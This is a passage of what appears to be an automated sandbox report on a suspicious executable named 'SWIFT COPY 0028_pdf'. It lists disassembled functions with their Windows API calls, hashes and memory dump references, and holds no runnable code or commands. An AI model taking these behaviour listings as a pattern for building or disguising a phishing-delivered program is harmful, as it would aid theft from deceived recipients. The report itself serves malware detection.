                                                                                    • Opcode Fuzzy Hash: f58c78faea22053957e64a5807f1510619b7f40dcc8e8d2dd8aa071634e13fe3
                                                                                    • Instruction Fuzzy Hash: 8B11E73250D315ABCF217FB1AC44B697B98AF813A6F208825FC499A191DB34CD849790
                                                                                    Function 0096058F Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 009605AC
                                                                                    • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 009605C7
                                                                                    • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 009605DD
                                                                                    • FreeLibrary.KERNEL32(?), ref: 00960632
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                                                                    • String ID:
                                                                                    • API String ID: 3137044355-0
                                                                                    • Opcode ID: 374ac2b821d6e0bc454d5bdac358e940160dd46134d873be490e585ab3404ec2
                                                                                    • Instruction ID: 5f8b4953f36642563d5c3bff9d1cfabc17207e305617618bb90dd1fc1a11775c
                                                                                    • Opcode Fuzzy Hash: 374ac2b821d6e0bc454d5bdac358e940160dd46134d873be490e585ab3404ec2
                                                                                    • Instruction Fuzzy Hash: 6C217C71901209EFDB208F91DCC8ADBBBB8EF80704F008A69E51A96150DB74EA55EF90
                                                                                    Function 00966713 Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00966733
                                                                                    • _memset.LIBCMT ref: 00966754
                                                                                    • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 009667A6
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 009667AF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseControlCreateDeviceFileHandle_memset
                                                                                    • String ID:
                                                                                    • API String ID: 1157408455-0
                                                                                    • Opcode ID: 43daac7d4e9c0ec6d11f961bc0227795d34b41d8cf4869287e4be244ab071461
                                                                                    • Instruction ID: f3e6d92f4e7d35204428ec3894f0bf29a3ac6f24dcad8008a3a400d6fe22aeb4
                                                                                    • Opcode Fuzzy Hash: 43daac7d4e9c0ec6d11f961bc0227795d34b41d8cf4869287e4be244ab071461
                                                                                    • Instruction Fuzzy Hash: 0E110672D023287AE7209BA5AC4DFAFBABCEF45724F10419AF505E71C0D2744E80CBA4
                                                                                    Function 0095B1CC Relevance: 6.1, APIs: 4, Instructions: 63memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0095AA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0095AA79
                                                                                      • Part of subcall function 0095AA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0095AA83
                                                                                      • Part of subcall function 0095AA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0095AA92
                                                                                      • Part of subcall function 0095AA62: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 0095AA99
                                                                                      • Part of subcall function 0095AA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0095AAAF
                                                                                    • GetLengthSid.ADVAPI32(?,00000000,0095ADE4,?,?), ref: 0095B21B
                                                                                    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 0095B227
                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0095B22E
                                                                                    • CopySid.ADVAPI32(?,00000000,?), ref: 0095B247
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
                                                                                    • String ID:
                                                                                    • API String ID: 4217664535-0
                                                                                    • Opcode ID: b9ab7c4de158188aaf8edfe62b9024a006042fa072d4f9dc369ec70515bc93fc
                                                                                    • Instruction ID: ea2ca6d9a5118cac2d607583c59e770b883e716db9cc32ac6fe506ac538547db
                                                                                    • Opcode Fuzzy Hash: b9ab7c4de158188aaf8edfe62b9024a006042fa072d4f9dc369ec70515bc93fc
                                                                                    • Instruction Fuzzy Hash: CE11CE71A00205EFCB04DF99EC84AAEB7ADEF95305F14802DE9539B250D731AE48DB60
                                                                                    Function 0095B478 Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 0095B498
                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0095B4AA
                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0095B4C0
                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0095B4DB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID:
                                                                                    • API String ID: 3850602802-0
                                                                                    • Opcode ID: d7efc94ed7358e84b3343db1a8db748a565912953a67c46695252ffcd8f7e8ca
                                                                                    • Instruction ID: 473a3d2d846c114d57ebea4db42164e5bd4e78a8adb154247ac43163dbfbdcdf
                                                                                    • Opcode Fuzzy Hash: d7efc94ed7358e84b3343db1a8db748a565912953a67c46695252ffcd8f7e8ca
                                                                                    • Instruction Fuzzy Hash: 5611487A900218FFDB21DFA9C881E9DBBB8FB08700F204091EA04B7290D771AE10DB94
                                                                                    Function 0093B55D Relevance: 6.1, APIs: 4, Instructions: 56COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0093B34E: GetWindowLongW.USER32(?,000000EB), ref: 0093B35F
                                                                                    • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0093B5A5
                                                                                    • GetClientRect.USER32(?,?), ref: 0099E69A
                                                                                    • GetCursorPos.USER32(?), ref: 0099E6A4
                                                                                    • ScreenToClient.USER32(?,?), ref: 0099E6AF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Client$CursorLongProcRectScreenWindow
                                                                                    • String ID:
                                                                                    • API String ID: 4127811313-0
                                                                                    • Opcode ID: a5fead8d846535cd19d8f51da86070e197ae8988c71ed780442217103705fcc5
                                                                                    • Instruction ID: e8c7a1312f8ef502e309d8b7985cd76761f05eef5ae936cde5aee6c5aa79238b
                                                                                    • Opcode Fuzzy Hash: a5fead8d846535cd19d8f51da86070e197ae8988c71ed780442217103705fcc5
                                                                                    • Instruction Fuzzy Hash: 0E115731A0102ABFDF10EF98CC899EE7BB9EF49304F000451FA02E7140D334AA81DBA1
                                                                                    Function 0096732B Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00967352
                                                                                    • MessageBoxW.USER32(?,?,?,?), ref: 00967385
                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0096739B
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 009673A2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                    • String ID:
                                                                                    • API String ID: 2880819207-0
                                                                                    • Opcode ID: 2bde66ab64aa0e7f36beefc0ea698b23a2794b47df4a57c099d2d89a3ea938dc
                                                                                    • Instruction ID: 11f0848bf92e3f7c04c6d6af9abd2b89edb20c15f99cf9f46a22078e180509df
                                                                                    • Opcode Fuzzy Hash: 2bde66ab64aa0e7f36beefc0ea698b23a2794b47df4a57c099d2d89a3ea938dc
                                                                                    • Instruction Fuzzy Hash: DB11C872A1C244BFC7019BA8DC49E9EBBADAF45314F144355F935E3351D6708D00ABA1
                                                                                    Function 0093D17C Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0093D1BA
                                                                                    • GetStockObject.GDI32(00000011), ref: 0093D1CE
                                                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 0093D1D8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateMessageObjectSendStockWindow
                                                                                    • String ID:
                                                                                    • API String ID: 3970641297-0
                                                                                    • Opcode ID: 01ed1d2ef45bbdcccca80478292eea64e50bbef8a147f583c1eb67933152f8cb
                                                                                    • Instruction ID: 906d109c18a564ce6419dd80506501a67a254ae8ff53099be73c9148cb69eaaa
                                                                                    • Opcode Fuzzy Hash: 01ed1d2ef45bbdcccca80478292eea64e50bbef8a147f583c1eb67933152f8cb
                                                                                    • Instruction Fuzzy Hash: 8811ADB250A509BFEF1A4F90AC60EEABB6DFF09364F040105FA0552050C731DD60AFE0
                                                                                    Function 00954DF2 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                    • String ID:
                                                                                    • API String ID: 3016257755-0
                                                                                    • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                    • Instruction ID: ee09999f2256dcfe57340054b25d0841bcc1fedf8212efb87a53a4a8dc176015
                                                                                    • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                    • Instruction Fuzzy Hash: 2401803200014EBBCF529E85DC168EE3F37BF18356B498415FE1859031D336CAB9AB81
                                                                                    Function 00947452 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00947A0D: __getptd_noexit.LIBCMT ref: 00947A0E
                                                                                    • __lock.LIBCMT ref: 0094748F
                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 009474AC
                                                                                    • _free.LIBCMT ref: 009474BF
                                                                                    • InterlockedIncrement.KERNEL32(00FE1390), ref: 009474D7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                                                    • String ID:
                                                                                    • API String ID: 2704283638-0
                                                                                    • Opcode ID: b4a207440a44fcfce5fd42096c4c1d8e30235f2663c5210d5be3090e6b5aa799
                                                                                    • Instruction ID: 8e97c981fca13a27110f30ff51a10e74f4c348ffaf1e7e8ff80d9683017a1835
                                                                                    • Opcode Fuzzy Hash: b4a207440a44fcfce5fd42096c4c1d8e30235f2663c5210d5be3090e6b5aa799
                                                                                    • Instruction Fuzzy Hash: 3501223694E629ABCB22AFA59805F2DFB62BF45710F168006F814736A0CB305980DFC2
                                                                                    Function 00947A94 Relevance: 6.0, APIs: 4, Instructions: 41COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __lock.LIBCMT ref: 00947AD8
                                                                                      • Part of subcall function 00947CF4: __mtinitlocknum.LIBCMT ref: 00947D06
                                                                                      • Part of subcall function 00947CF4: EnterCriticalSection.KERNEL32(00000000,?,00947ADD,0000000D), ref: 00947D1F
                                                                                    • InterlockedIncrement.KERNEL32(?), ref: 00947AE5
                                                                                    • __lock.LIBCMT ref: 00947AF9
                                                                                    • ___addlocaleref.LIBCMT ref: 00947B17
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                                                    • String ID:
                                                                                    • API String ID: 1687444384-0
                                                                                    • Opcode ID: af957c62ae72c2390265b38a7dee1b41b78900c14f679340a9aec33fa4d09a6c
                                                                                    • Instruction ID: 9fd6d6070eafece87e99401c16e6b7328fa56916d013baf17e31df9939759699
                                                                                    • Opcode Fuzzy Hash: af957c62ae72c2390265b38a7dee1b41b78900c14f679340a9aec33fa4d09a6c
                                                                                    • Instruction Fuzzy Hash: 0A015B71445B049ED720DFB5D905B4AF7F0EF80325F20890EA49A966E0CB74A680CB51
                                                                                    Function 0098E32E Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 0098E33D
                                                                                    • _memset.LIBCMT ref: 0098E34C
                                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,009E3D00,009E3D44), ref: 0098E37B
                                                                                    • CloseHandle.KERNEL32 ref: 0098E38D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: _memset$CloseCreateHandleProcess
                                                                                    • String ID:
                                                                                    • API String ID: 3277943733-0
                                                                                    • Opcode ID: 44f6c2bcd294b31c614a104b598498784cd0202334464895fcd840bad534e358
                                                                                    • Instruction ID: b4d1802adbf4235d8c3e378cc1f7acd06b631aa6777ccc9d67e4fa3d76b3252e
                                                                                    • Opcode Fuzzy Hash: 44f6c2bcd294b31c614a104b598498784cd0202334464895fcd840bad534e358
                                                                                    • Instruction Fuzzy Hash: C9F0BEF0920344BAE3112B61EC89F773E9DDB09714F008021BF08DB1E2D3719E40A6A8
                                                                                    Function 0098EA6A Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0093AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0093AFE3
                                                                                      • Part of subcall function 0093AF83: SelectObject.GDI32(?,00000000), ref: 0093AFF2
                                                                                      • Part of subcall function 0093AF83: BeginPath.GDI32(?), ref: 0093B009
                                                                                      • Part of subcall function 0093AF83: SelectObject.GDI32(?,00000000), ref: 0093B033
                                                                                    • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0098EA8E
                                                                                    • LineTo.GDI32(00000000,?,?), ref: 0098EA9B
                                                                                    • EndPath.GDI32(00000000), ref: 0098EAAB
                                                                                    • StrokePath.GDI32(00000000), ref: 0098EAB9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                    • String ID:
                                                                                    • API String ID: 1539411459-0
                                                                                    • Opcode ID: 2ee97c4f949302ab1040e64746f13be78bcb4293f984e473aebf1e4dffa46dad
                                                                                    • Instruction ID: e6d037acbe3d5bf9a4b5611f422d415859733b3ab13f23ac5fcd09181f35a3c9
                                                                                    • Opcode Fuzzy Hash: 2ee97c4f949302ab1040e64746f13be78bcb4293f984e473aebf1e4dffa46dad
                                                                                    • Instruction Fuzzy Hash: CFF0823101A269BBDB12AF94AD0DFCE3F19AF07711F044101FA12651E187745A52EBD5
                                                                                    Function 0095C82D Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0095C84A
                                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 0095C85D
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0095C864
                                                                                    • AttachThreadInput.USER32(00000000), ref: 0095C86B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                    • String ID:
                                                                                    • API String ID: 2710830443-0
                                                                                    • Opcode ID: 11613e2944e356f6fdb0422f04836ef5d00eba64f24aae5fbb81a09f1cbda782
                                                                                    • Instruction ID: aba7acd5f43ef7ba97c64bbf86019cbdf0874e9c9b96e467daeeb810939a50e2
                                                                                    • Opcode Fuzzy Hash: 11613e2944e356f6fdb0422f04836ef5d00eba64f24aae5fbb81a09f1cbda782
                                                                                    • Instruction Fuzzy Hash: 89E065B11463247ADB105F62DC0DEDB7F5CEF067A1F008011BA0E84850C671D584DBE0
                                                                                    Function 0095B0CD Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetCurrentThread.KERNEL32 ref: 0095B0D6
                                                                                    • OpenThreadToken.ADVAPI32(00000000,?,?,?,0095AC9D), ref: 0095B0DD
                                                                                    • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,0095AC9D), ref: 0095B0EA
                                                                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,0095AC9D), ref: 0095B0F1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: CurrentOpenProcessThreadToken
                                                                                    • String ID:
                                                                                    • API String ID: 3974789173-0
                                                                                    • Opcode ID: 3f8bd89967080b2202f83162e7df7be0c2bcb97c68d0d26c8100e834975b005c
                                                                                    • Instruction ID: decc88784988125051f473016d67b35a3dfbc21fae34bafe6a1934afa339821d
                                                                                    • Opcode Fuzzy Hash: 3f8bd89967080b2202f83162e7df7be0c2bcb97c68d0d26c8100e834975b005c
                                                                                    • Instruction Fuzzy Hash: 70E08672616221ABDB205FB25C0DB473BACEF56796F028818F743D6080DB348406D7A0
                                                                                    Function 0093B47D Relevance: 6.0, APIs: 4, Instructions: 22COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetSysColor.USER32(00000008), ref: 0093B496
                                                                                    • SetTextColor.GDI32(?,000000FF), ref: 0093B4A0
                                                                                    • SetBkMode.GDI32(?,00000001), ref: 0093B4B5
                                                                                    • GetStockObject.GDI32(00000005), ref: 0093B4BD
                                                                                    • GetWindowDC.USER32(?,00000000), ref: 0099DE2B
                                                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 0099DE38
                                                                                    • GetPixel.GDI32(00000000,?,00000000), ref: 0099DE51
                                                                                    • GetPixel.GDI32(00000000,00000000,?), ref: 0099DE6A
